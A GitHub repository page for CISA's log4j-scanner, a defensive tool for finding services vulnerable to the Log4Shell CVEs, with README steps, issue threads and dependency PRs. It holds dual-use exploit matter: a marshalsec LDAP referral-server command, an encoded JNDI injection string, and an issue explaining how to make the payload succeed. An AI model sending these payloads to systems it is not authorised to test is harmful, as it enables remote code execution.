log4j-scanner is a project derived from other members of the open-source community by CISA's Rapid Action Force team to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities.

Related tags

Spring Boot log4j-scanner
Overview

Log4j Scanner

This repository provides a scanning solution for the log4j Remote Code Execution vulnerabilities (CVE-2021-44228 & CVE-2021-45046). The information and code in this repository is provided "as is" and was assembled with the help of the open-source community and updated by CISA through collaboration with the broader cybersecurity community.

Official CISA Guidance & Resources

CISA Current Activity Alerts

CVE-2021-44228 & CVE-2021-45046

Steps to test

Configure your own DNS Server - Preferred)
- Add DNS records to your domain. (example.com)

  • A record with a value of your IP address (test.example.com -> )

  • NS record (ns1.example.com) with a value of the test.example.com as chosen above.

  • Host a DNS server to log DNS requests made to your domain.

  • Install the requirement modules -> pip3 install -r requirements.txt

  • Modify the dns/ddnsserver.py script with the value of the NS record above (test.example.com)

  • python3 dns/ddnsserver.py --udp 53 >> dns-results.txt

  • Test it with nslookup hello.test.example.com. You can run tail -f dns-results.txt to monitor these logs.

  • You should see the entry in your dns-results.txt file after the nslookup command. Once you do, you're ready to scan!

  • Note: Same concepts will apply if you're using internal DNS to test this.

DNS providers - (Interact.sh or canarytokens.org)

  • Interact.sh - Interactsh is an open-source solution for out-of-band data extraction. It is a tool designed to detect bugs that cause external interactions. These bugs include, Blind SQLi, Blind CMDi, SSRF, etc.

  • Canarytokens.org - Canarytokens helps track activity and actions on your network.

LDAP Server (OPTIONAL)

  • Reference the README.md under the ldap directory if you'd also like to test a running LDAP server.

  • Build the project using maven. cd ldap

  • mvn clean package -DskipTests

  • nohup java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8080/#payload" 443 >> ldap_requests.txt &

  • There are alternatives to this project as well.

HTTP Service Discovery & Scanning

  • Gather your most update-to-date asset list of your organization and find web services. Though this vulnerability does not solely affect web services, this will serve as a great starting point to minimizing the attack surface.

  • If you have a list of company owned URLS, you may skip this step: Utilize some well known tools like httpprobe or httpx to identify web services running on multiple ports. Basic Example: httpprobe -> cat list-of-your-company-domains.txt | $HOME/go/bin/httprobe > your-web-assets.txt

  • Now that you have a list of URLs, you're ready to scan: python3 log4j-scan.py --run-all-tests --custom-dns-callback-host test.example.com -l web-asset-urls.txt

  • Be sure to scan for the new CVE as well -> python3 log4j-scan.py --test-CVE-2021-45046 --custom-dns-callback-host test.example.com -l web-asset-urls.txt

  • Monitor the DNS server configured in Step 2.

CREDITS

As many in industry, we did not feel the need to "re-invent the wheel". This recommended scanning solution is derived from the great work of others (with slight modifications). We've included two additional projects to avoid using third-parties.

log4-scanner - Log4j vulnerability scanning framework. Thank you to the @fullhunt.io team.

dns - Simple DNS server (UDP and TCP) in Python. Thank you @pklaus & @andreif.

ldap - Contains useful code to test the lookup() call. Thank you @mbechler

Issues

If you have issues using the code, open an issue on the repository!

You can do this by clicking "Issues" at the top and clicking "New Issue" on the following page.

Contributing

We welcome contributions! Please see here for details.

Disclaimers

  • There are likely additional, as yet unknown ways to leverage these (CVE-2021-44228 & CVE-2021-45046) vulnerabilities. CISA is staying vigilant across multiple platforms (blog posts, repos, tweets, etc.) to stay up-to-date as the log4j situation unfolds and progresses.

  • This repository will focus solely on providing tooling to help organizations look for a limited set of currently known vulnerabilities in assets owned by their organization.

  • For CISA's official guidance on these vulnerabilities, please follow this repository.

License

The following attributions are referenced and/or derivative works distributed with this source:

log4j_scanner Copyright 2021 Mazin Ahmed

Java Unmarshaller Security Copyright 2021 Moritz Bechler

MIT License Applicable to Original log4j_scanner and Java Unmarshaller Security Works: Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

Simple DNS Server Copyright 2021 Andrei Fokau

Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at:

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.

Any and all changes applied by CISA are in the public domain.

Legal Disclaimer

NOTICE

USE THIS SOFTWARE AT YOUR OWN RISK. THIS SOFTWARE COMES WITH NO WARRANTY, EITHER EXPRESS OR IMPLIED. THE UNITED STATES GOVERNMENT ASSUMES NO LIABILITY FOR THE USE OR MISUSE OF THIS SOFTWARE OR ITS DERIVATIVES.

THIS SOFTWARE IS OFFERED “AS-IS.” THE UNITED STATES GOVERNMENT WILL NOT INSTALL, REMOVE, OPERATE OR SUPPORT THIS SOFTWARE AT YOUR REQUEST. IF YOU ARE UNSURE OF HOW THIS SOFTWARE WILL INTERACT WITH YOUR SYSTEM, DO NOT USE IT.

NO ENDORSEMENT

CISA does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by CISA.

Comments
  • Why is CISA referencing CanaryTokens?

    Why is CISA referencing CanaryTokens?

    Why is CISA referencing the canarytoken service in documentation?

    The reason I ask is because Fullhunt's log4j-scan, the project that CISA is referencing, doesn't need an injection token. It generates it on its own. What log4j-scan needs is a DNS callback service like interact.sh or dnslog.cn.

    Did I misunderstand or miss anything?

    opened by chaostheory 12
  • ddnsserver.py: error: unrecognized arguments: 53

    ddnsserver.py: error: unrecognized arguments: 53

    command: python3 ddnsserver.py --udp 53

    o/p:

    usage: ddnsserver.py [-h] [--port PORT] [--tcp] [--udp] ddnsserver.py: error: unrecognized arguments: 53

    Screenshot 2021-12-23 at 11 13 36 PM
    opened by shivammusic 4
  • Connection timeout during standard execution

    Connection timeout during standard execution

    🐛 Summary

    What's wrong? Please be specific.

    Connection timeout error during log4j-scanner execution. Of course, I have connectivity with the target.

    Steps to reproduce the behavior:

    1. Execute: python3 log4-scanner/log4j-scan.py -u https://host

    Any helpful log output or screenshots

    Screenshot_2022-08-31_09_23_50

    opened by pablosnt 3
  • Does not work with http or http://***:80

    Does not work with http or http://***:80

    I Get following error when i try for http protocol

    EXCEPTION: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None))[0m

    opened by PrestonD88 3
  • requirements.txt file missing

    requirements.txt file missing

    🐛 Summary

    The requirements.txt is missing from the log4-scanner folder

    To reproduce

    Steps to reproduce the behavior:

    1. cd log4-scanner
    2. docker build . -t log4-scanner

    Expected behavior

    docker container to build

    Any helpful log output or screenshots

    failed docker build

     => [internal] load build context                                                                                                0.3s
 => => transferring context: 42.25kB                                                                                             0.2s
 => CACHED [2/6] WORKDIR /app                                                                                                    0.0s
 => ERROR [3/6] COPY requirements.txt requirements.txt                                                                           0.0s
------
 > [3/6] COPY requirements.txt requirements.txt:
------
failed to compute cache key: "/requirements.txt" not found: not found

    Add any screenshots of the problem here.

    opened by paulbadcock 3
  • Python3.9 User get error

    Python3.9 User get error "AttributeError: module 'time' has no attribute 'clock'"

    if u got this "AttributeError: module 'time' has no attribute 'clock'"

    Try this

    vim /usr/local/lib/python3.9/site-packages/Crypto/Random/_UserFriendlyRNG.py

    line 77 : "t = time.clock()" to "t = time.perf_counter()"

    opened by wkc41511 3
  • Adding free non-tracking Contrast tool

    Adding free non-tracking Contrast tool

    🗣 Description

    💭 Motivation and context

    🧪 Testing

    ✅ Pre-approval checklist

    • [x] This PR has an informative and human-readable title.
    • [x] Changes are limited to a single goal - eschew scope creep!
    • [x] All future TODOs are captured in issues, which are referenced in code comments.
    • [x] All relevant type-of-change labels have been added.
    • [x] I have read the CONTRIBUTING document.
    • [x] These code changes follow cisagov code standards.
    • [x] All relevant repo and/or project documentation has been updated to reflect the changes in this PR.
    • [x] Tests have been added and/or modified to cover the changes in this PR.
    • [x] All new and existing tests pass.

    ✅ Pre-merge checklist

    • [ ] Revert dependencies to default branches.
    • [ ] Finalize version.

    ✅ Post-merge checklist

    • [ ] Add a tag or create a release.
    opened by erikcostlow 3
  • Some updates for enterprise

    Some updates for enterprise

    I like the tool but I have a few issues that I hope can be resolved. The examples for how to use it are rather vague, I would like better help files on this.

    There are two big problems that I think need some real attention, these would be:

    1. No baked in system for company wide deployment a. Running the tool one at a time is very time consuming. I have modified the code for our use so it can be pushed to all servers at once and receive the results in the form of a CSV file. Recommend this or a similar change to allow for broad enterprise use.
    2. Access denied errors when indexing the C drive.
      a. The scan will randomly encounter access denied errors when indexing the C drive on some machines, even when run in an administrator shell. I believe this is due to the tool attempting to look in the windows owned folders. The problem that I find is the tool will error when it comes across these folders, then will not continue the scan. The work around I have come up with is to either to not index the whole drive, but in doing this we must know where the Log4j files are, and that can be quite hard to ascertain. Or, the user can take ownership of all files on the drive, then scan. But with that a whole new can of worms can be opened.

    I would love to see these issues addressed and ultimately resolved. We appreciate all that you do, especially with regards to jumping on these zero day's and providing tooling so quickly.

    --Thank you, Jared Bebout.

    opened by cyberguyusa 3
  • Testing

    Testing "invalid" HTTP sites

    Currently, the tool uses a generic library to connect to the HTTPS site and the library rejects connections if there is a TLS problem (expired certificate, unknown CA, etc). This is of course reasonable as a default behavior but it prevents the tool to test such sites:

    EXCEPTION: HTTPSConnectionPool(host='stuff.example', port=443): Max retries exceeded with url: /?v=%24%7Bjndi%3Aldap%3A%2F%2Fstuff.example.test.example.com%2F9dxbb6y%7D (Caused by SSLError(SSLError(1, '[SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:1123)')))

    It could be nice to have a way to disable TLS checks.

    opened by bortzmeyer 2
  • Payload for the URL is always encoded, not matching script output

    Payload for the URL is always encoded, not matching script output

    🐛 Summary

    URL is encoded by the Requests library. Only URL encoded attacks on the URI are being sent to the target(s) which is leading to false negatives.

    I believe this is unexpected behavior, and the payload is intended to be sent via the URL as output by the script (not encoded). However, it is possible unencoded characters would just lead to more dropped packets, so it may be best to include both.

    To reproduce

    Steps to reproduce the behavior:

    1. Capture the traffic when executing the script and observe the HTTP requests. These do not match the output provided in the script due to how the Requests library functions.

    Expected behavior

    Expected behavior would send a request containing the exact payload printed by the script. Using a function such as urllib.request.urlopen() is able to deliver the payload properly in the URL.

    Any helpful log output or screenshots

    The following code was added to send a non-urlencoded request. from urllib import parse as urlparse, request

    ...

    print("sending a payload using a different library...")

    cprint(f"[•] URL: {url} | PAYLOAD: {payload}", "cyan")

    request.urlopen(url + "?v=" + payload)

    This was added to the end of the script to compare over Wireshark.

    CISA_script_output

    WireShark

    In this instance within a lab environment, the current script was not able to successfully attack a known vulnerable version due to this. Once modified to deliver the payload as printed, the attack was successful.

    opened by johndoe2293022490 2
  • Getting below error

    Getting below error

    python3 log4j-scan.py -h File "log4j-scan.py", line 148 fuzzing_headers["Referer"] = f'https://{fuzzing_headers["Referer"]}' ^ SyntaxError: invalid syntax

    opened by PrestonD88 2
  • Add CodeQL workflow for GitHub code scanning

    Add CodeQL workflow for GitHub code scanning

    Hi cisagov/log4j-scanner!

    This is a one-off automatically generated pull request from LGTM.com :robot:. You might have heard that we’ve integrated LGTM’s underlying CodeQL analysis engine natively into GitHub. The result is GitHub code scanning!

    With LGTM fully integrated into code scanning, we are focused on improving CodeQL within the native GitHub code scanning experience. In order to take advantage of current and future improvements to our analysis capabilities, we suggest you enable code scanning on your repository. Please take a look at our blog post for more information.

    This pull request enables code scanning by adding an auto-generated codeql.yml workflow file for GitHub Actions to your repository — take a look! We tested it before opening this pull request, so all should be working :heavy_check_mark:. In fact, you might already have seen some alerts appear on this pull request!

    Where needed and if possible, we’ve adjusted the configuration to the needs of your particular repository. But of course, you should feel free to tweak it further! Check this page for detailed documentation.

    Questions? Check out the FAQ below!

    FAQ

    Click here to expand the FAQ section

    How often will the code scanning analysis run?

    By default, code scanning will trigger a scan with the CodeQL engine on the following events:

    • On every pull request — to flag up potential security problems for you to investigate before merging a PR.
    • On every push to your default branch and other protected branches — this keeps the analysis results on your repository’s Security tab up to date.
    • Once a week at a fixed time — to make sure you benefit from the latest updated security analysis even when no code was committed or PRs were opened.

    What will this cost?

    Nothing! The CodeQL engine will run inside GitHub Actions, making use of your unlimited free compute minutes for public repositories.

    What types of problems does CodeQL find?

    The CodeQL engine that powers GitHub code scanning is the exact same engine that powers LGTM.com. The exact set of rules has been tweaked slightly, but you should see almost exactly the same types of alerts as you were used to on LGTM.com: we’ve enabled the security-and-quality query suite for you.

    How do I upgrade my CodeQL engine?

    No need! New versions of the CodeQL analysis are constantly deployed on GitHub.com; your repository will automatically benefit from the most recently released version.

    The analysis doesn’t seem to be working

    If you get an error in GitHub Actions that indicates that CodeQL wasn’t able to analyze your code, please follow the instructions here to debug the analysis.

    How do I disable LGTM.com?

    If you have LGTM’s automatic pull request analysis enabled, then you can follow these steps to disable the LGTM pull request analysis. You don’t actually need to remove your repository from LGTM.com; it will automatically be removed in the next few months as part of the deprecation of LGTM.com (more info here).

    Which source code hosting platforms does code scanning support?

    GitHub code scanning is deeply integrated within GitHub itself. If you’d like to scan source code that is hosted elsewhere, we suggest that you create a mirror of that code on GitHub.

    How do I know this PR is legitimate?

    This PR is filed by the official LGTM.com GitHub App, in line with the deprecation timeline that was announced on the official GitHub Blog. The proposed GitHub Action workflow uses the official open source GitHub CodeQL Action. If you have any other questions or concerns, please join the discussion here in the official GitHub community!

    I have another question / how do I get in touch?

    Please join the discussion here to ask further questions and send us suggestions!

    opened by lgtm-com[bot] 0
  • build(deps): bump jackson-databind from 2.13.1 to 2.13.4.1 in /ldap

    build(deps): bump jackson-databind from 2.13.1 to 2.13.4.1 in /ldap

    Bumps jackson-databind from 2.13.1 to 2.13.4.1.

    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
    • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
    • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
    • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

    You can disable automated security fix PRs for this repo from the Security Alerts page.

    dependencies 
    opened by dependabot[bot] 0
  • build(deps): bump unboundid-ldapsdk from 3.1.1 to 4.0.5 in /ldap

    build(deps): bump unboundid-ldapsdk from 3.1.1 to 4.0.5 in /ldap

    Bumps unboundid-ldapsdk from 3.1.1 to 4.0.5.

    Release notes

    Sourced from unboundid-ldapsdk's releases.

    UnboundID LDAP SDK for Java 4.0.5

    We have just released the UnboundID LDAP SDK for Java version 4.0.5, available for download from the LDAP.com website, from the releases page of our GitHub repository, from the Files page of our SourceForge project, and from the Maven Central Repository.

    The most significant change in this release is the fix for a vulnerability described in CVE-2018-1000134. In an application that uses the LDAP SDK in synchronous mode, that uses the LDAP simple bind operation to authenticate users, that does not properly check to ensure that the user actually provided a password, and that sends its request to a directory server that does not follow the RFC 4513 section 5.1.2 recommendation to reject simple bind requests with a DN but no password, this bug could have allowed the application to mistakenly grant access to an attacker who identified themselves as a legitimate user but supplied an empty password. See CVE-2018-1000134 and the UnboundID LDAP SDK for Java for more information about this issue.

    Other changes in the 4.0.5 release of the LDAP SDK include:

    • Updated the command-line argument parser so that it will not assign a value from a properties file to an argument if that argument is part of an exclusive argument set and another argument in that set was provided on the command line.

    • Fixed a manage-certificates bug in which the validity start time and validity duration values would be ignored when generating a self-signed certificate intended to replace an existing certificate. In that case, the tool would have always used the current time as the start time and a duration of one year.

    • Updated the manage-certificates tool to change the primary name for the existing --replace-existing-certificate argument in the generate-certificate-signing-request subcommand to be --use-existing-key-pair, and updated the usage information to make it clearer that using this option will not cause the keystore to be updated. The former --replace-existing-certificate identifier can still be used and will behave in exactly the same way as before, so there is no change in functionality.

    • Improved the usability of the ldap-debugger tool when using the --listenUsingSSL argument by ensuring that the --keyStorePath argument is also provided, along with one of the --keyStorePassword, --keyStorePasswordFile, and --promptForKeyStorePassword arguments.

    • Fixed a number of cases in which there was a mismatch between the arguments provided to a message format string and the arguments expected by that format string. Unit tests have been added to help prevent this from recurring.

    • Added a new PassphraseEncryptedOutputStream class that can be used to write encrypted data with a key generated from a provided passphrase. Also added a new PassphraseEncryptedInputStream class that can be used to read encrypted data written with the PassphraseEncryptedOutputStream when provided with the correct passphrase.

    • Added new RateLimitedInputStream and RateLimitedOutputStream classes that can be used to impose a maximum rate (in bytes per second) at which data can be read from a wrapped input stream or written to a wrapped output stream.

    • Added new CloseableLock and CloseableReadWriteLock classes that provide the same basic functionality as Java's ReentrantLock and ReentrantReadWriteLock classes, but that can also be used with Java's try-with-resources facility.

    • Added a new FixedBarrier.await(int) method that can be used to request rate limiting for the specified number of occurrences, rather than just a single occurrence. This can be used to make it easier to impose rate limiting in instances where the event that you're limiting doesn't fit into the existing paradigm. For example, it could be used to implement a rate-limited output stream in which you want to be able to specify the number of bytes being written at a time, instead of requiring a separate await() call for each byte being written.

    • Updated the ldapsearch, ldapmodify, split-ldif, transform-ldif, and validate-ldif tools to add support for encrypted LDIF files. The passphrase used to generate the encryption key can be provided interactively or read from a file.

    • Added support for two new UnboundID/Ping-proprietary request controls that can help clients prevent inadvertently requesting unindexed searches. The reject unindexed search request control can be used to indicate that the server should reject a search request if it cannot be efficiently processed using server indexes, even if the requester has the unindexed-search privilege. The permit unindexed search request control can be used to indicate that the server should process the search request even if it is unindexed, as long as the requester has the unindexed-search-with-control privilege. The ldapsearch tool has also been updated allow these controls to be included in the search requests that it generates.

    • Added support for a new UnboundID/Ping-proprietary request control that can be included in a search request to indicate that the client wishes to override an internal limit that might otherwise be in effect for that operation. The ldapsearch tool has been updated to allow this control to be included in the search requests that it generates.

    • Updated the summarize-access-log tool to add support for encrypted log files. The passphrase used to generate the encryption key can be provided interactively or read from a file.

    UnboundID LDAP SDK for Java 4.0.4

    We have just released the UnboundID LDAP SDK for Java version 4.0.4, available for download from the LDAP.com website, from the releases page of our GitHub repository, from the Files page of our SourceForge project, and from the Maven Central Repository.

    There are a few noteworthy changes included in this release. The release notes go into more detail, but the highlights of these changes include:

    • We updated the way that the LDAP SDK generates exception messages to make them more user-friendly. They are now less likely to include stack traces, and they are less likely to include repeated information (like LDAP SDK build information, and information duplicated from an exception’s cause).
    • We fixed an issue that could cause multiple application threads to block in the course of closing a connection pool.
    • We updated the way that the LDAP SDK sends LDAP messages so that it is more resilient to stalls in the TLS negotiation process.
    • We updated the LDAP SDK’s ServerSet implementations so that they can perform authentication and post-connect processing, which can make health checks against newly established connections more reliable.
    • We updated the GetEntryLDAPConnectionPoolHealthCheck class to provide support for invoking the health check after a pooled connection has been authenticated.
    • We fixed a bug in the GetEntryLDAPConnectionPoolHealthCheck class that could cause it to behave incorrectly when checking the validity of a connection after an LDAPException was caught.
    • We updated the Attribute.hasValue method to be more efficient for attributes with multiple values, and especially for attributes with a lot of values or with more complicated matching rules. This will also improve the Filter.matchesEntry method for equality filters that target similar types of attributes.
    • We updated the prompt trust manager to provide better output formatting, and to provide additional warnings about conditions that may make a server certificate chain less trustworthy.
    • We updated the LDAPConnectionOptions class to adjust the initial default connect timeout and operation response timeout, and the default operation response timeout can now be set differently for each type of operation. Most of the default values for options in the LDAPConnectionOptions class can now be set via system properties.

    UnboundID LDAP SDK for Java 4.0.3

    The 4.0.3 release of the LDAP SDK contains a single bugfix over the 4.0.2 version. Just after releasing the 4.0.2 version, we found a bug in the way that the LDAP SDK generated and verified signatures for X.509 certificates and PKCS10 certificate signing requests. That has been corrected, and the 4.0.3 release is available for download from the LDAP.com website, from our GitHub repository, from the SourceForge project, or from the Maven Central Repository.

    ... (truncated)

    Changelog

    Sourced from unboundid-ldapsdk's changelog.

              <div align="right">

    ${TARGET="offline"} LDAP SDK Home Page ${TARGET="offline"} Product Information 

              <h2>Release Notes</h2>

          &lt;h3&gt;Version 6.0.6&lt;/h3&gt;

      &amp;lt;p&amp;gt;
    The following changes were made between the 6.0.5 and 6.0.6 releases:
  &amp;lt;/p&amp;gt;

  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;
      Fixed an issue that could cause request failures when closing a connection that
      has outstanding operations in the default asynchronous mode, immediately
      re-establishing the connection (to the same or a different server), and sending
      a request on the newly established connection.  However, we generally recommend
      creating a new connection object (or using a connection pool) in these cases,
      rather than closing and re-establishing the same connection object.
      &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;
    &amp;lt;/li&amp;gt;

    &amp;lt;li&amp;gt;
      Fixed an issue that could interfere with the ability to get a default SSLContext
      on modern versions of Java (e.g., Java 17) when using the LDAP SDK in FIPS
      140-2-compliant mode.
      &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;
    &amp;lt;/li&amp;gt;

    &amp;lt;li&amp;gt;
      Updated the LDAPConnectionOptions class to add support for a new
      com.unboundid.ldap.sdk.LDAPConnectionOptions.defaultVerifyCertificateHostnames
      system property that can be used to enable certificate hostname verification by
      default.  This verification was previously available by calling the
      LDAPConnectionOptions.setSSLSocketVerifier method with a
      HostNameSSLSocketVerifier instance, but the new system property can be used to
      enable this verification by default without any code changes.  Even though
      hostname verification is strongly recommended, it is disabled by default in the
      LDAP SDK for backward compatibility purposes, and for compatibility with a wide
      range of development, test, and even production environments that are not
      properly set up with certificates that allow for hostname verification.
      &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;
    &amp;lt;/li&amp;gt;

    &amp;lt;li&amp;gt;
      Updated the LDAP command-line tool framework to add a new
      &amp;quot;--verifyCertificateHostnames&amp;quot; argument that can be used to enable hostname

    ... (truncated)

    Commits
    • b28fb50 Update the release notes for the 4.0.5 release
    • 7d02fa0 Add an override search limits request control
    • e30ae57 Add forName methods to enum classes
    • 58a46d0 Fix an OS-specific issue in ToolInvocationLogger
    • 8c77d1e Make a number of format string fixes
    • 2e65024 Update ToolUtils.promptForEncryptionPassphrase
    • 8471904 Fix a SimpleBindRequest bug
    • 41df758 Better summarize-access-log encryption support
    • 900ff84 Minor update in ToolUtils
    • cdb139e Add tool compression and encryption support
    • Additional commits viewable in compare view

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
    • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
    • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
    • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

    You can disable automated security fix PRs for this repo from the Security Alerts page.

    dependencies 
    opened by dependabot[bot] 0
  • [Snyk] Security upgrade python from 3.11.0a5-alpine to 3.11.0b1-alpine

    [Snyk] Security upgrade python from 3.11.0a5-alpine to 3.11.0b1-alpine

    Keeping your Docker base image up-to-date means you’ll benefit from security fixes in the latest version of your chosen image.

    Changes included in this PR

    • log4-scanner/Dockerfile

    We recommend upgrading to python:3.11.0b1-alpine, as this image has only 0 known vulnerabilities. To do this, merge this pull request, then verify your application still works as expected.

    Some of the most important vulnerabilities in your base image include:

    | Severity | Priority Score / 1000 | Issue | Exploit Maturity | | :------: | :-------------------- | :---- | :--------------- | | critical severity | 500 | CVE-2022-28391
    SNYK-ALPINE315-BUSYBOX-2440607 | No Known Exploit | | critical severity | 500 | CVE-2022-28391
    SNYK-ALPINE315-BUSYBOX-2440607 | No Known Exploit | | high severity | 400 | Loop with Unreachable Exit Condition ('Infinite Loop')
    SNYK-ALPINE315-OPENSSL-2426331 | No Known Exploit | | high severity | 400 | Loop with Unreachable Exit Condition ('Infinite Loop')
    SNYK-ALPINE315-OPENSSL-2426331 | No Known Exploit | | high severity | 511 | Out-of-bounds Write
    SNYK-ALPINE315-ZLIB-2434420 | No Known Exploit |

    Note: You are seeing this because you or someone else with access to this repository has authorized Snyk to open fix PRs.

    For more information: 🧐 View latest project report

    🛠 Adjust project settings

    Learn how to fix vulnerabilities with free interactive lessons:

    🦉 Learn about vulnerability in an interactive lesson of Snyk Learn.

    opened by snyk-bot 0
  • [Snyk] Fix for 1 vulnerabilities

    [Snyk] Fix for 1 vulnerabilities

    This PR was automatically created by Snyk using the credentials of a real user.


    Snyk has created this PR to fix one or more vulnerable packages in the `maven` dependencies of this project.

    Changes included in this PR

    • Changes to the following files to upgrade the vulnerable dependencies to a fixed version:
      • ldap/pom.xml

    Vulnerabilities that will be fixed

    With an upgrade:

    Severity | Priority Score (*) | Issue | Upgrade | Breaking Change | Exploit Maturity | Reachability :-------------------------:|-------------------------|:-------------------------|:-------------------------|:-------------------------|:-------------------------|:------------------------- medium severity | 465/1000
    Why? Recently disclosed, Has a fix available, CVSS 5.3 | Denial of Service (DoS)
    SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313 | org.springframework:spring-aop:
    4.3.30.RELEASE -> 5.2.22.RELEASE
    org.springframework:spring-beans:
    4.3.30.RELEASE -> 5.2.22.RELEASE
    org.springframework:spring-context:
    4.3.30.RELEASE -> 5.2.22.RELEASE
    | Yes | No Known Exploit | No Path Found

    (*) Note that the real score may have changed since the PR was raised.

    Check the changes in this PR to ensure they won't cause issues with your project.

    Note: You are seeing this because you or someone else with access to this repository has authorized Snyk to open fix PRs.

    For more information: 🧐 View latest project report

    🛠 Adjust project settings

    📚 Read more about Snyk's upgrade and patch logic

    Learn how to fix vulnerabilities with free interactive lessons:

    🦉 Learn about vulnerability in an interactive lesson of Snyk Learn.

    opened by felddy 0
  • [Snyk] Security upgrade org.springframework:spring-context from 4.3.30.RELEASE to 5.2.21.RELEASE

    [Snyk] Security upgrade org.springframework:spring-context from 4.3.30.RELEASE to 5.2.21.RELEASE

    Snyk has created this PR to fix one or more vulnerable packages in the `maven` dependencies of this project.

    Changes included in this PR

    • Changes to the following files to upgrade the vulnerable dependencies to a fixed version:
      • ldap/pom.xml

    Vulnerabilities that will be fixed

    With an upgrade:

    Severity | Priority Score (*) | Issue | Upgrade | Breaking Change | Exploit Maturity | Reachability :-------------------------:|-------------------------|:-------------------------|:-------------------------|:-------------------------|:-------------------------|:------------------------- low severity | 385/1000
    Why? Recently disclosed, Has a fix available, CVSS 3.7 | Improper Handling of Case Sensitivity
    SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634 | org.springframework:spring-context:
    4.3.30.RELEASE -> 5.2.21.RELEASE
    | Yes | No Known Exploit | No Path Found

    (*) Note that the real score may have changed since the PR was raised.

    Check the changes in this PR to ensure they won't cause issues with your project.

    Note: You are seeing this because you or someone else with access to this repository has authorized Snyk to open fix PRs.

    For more information: 🧐 View latest project report

    🛠 Adjust project settings

    📚 Read more about Snyk's upgrade and patch logic

    Learn how to fix vulnerabilities with free interactive lessons:

    🦉 Learn about vulnerability in an interactive lesson of Snyk Learn.

    opened by snyk-bot 0
Owner
Cybersecurity and Infrastructure Security Agency
Commit today, secure tomorrow.
Cybersecurity and Infrastructure Security Agency
GitHub
This repository contains the IRPact agent-based modeling framework for innovation diffusion of sustainable product in private households. It has been developed within the SUSIC project at Leipzig University and the Institute for Applied Informatics by the project members.

IRPact IRPact is a framework for agent-based modelling of innovation diffusion of sustainable products in private households. It is written in the Jav

null 3 Dec 16, 2021
This extension identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities.

param-miner This extension identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities. It combin

Intruder 9 Jan 27, 2022
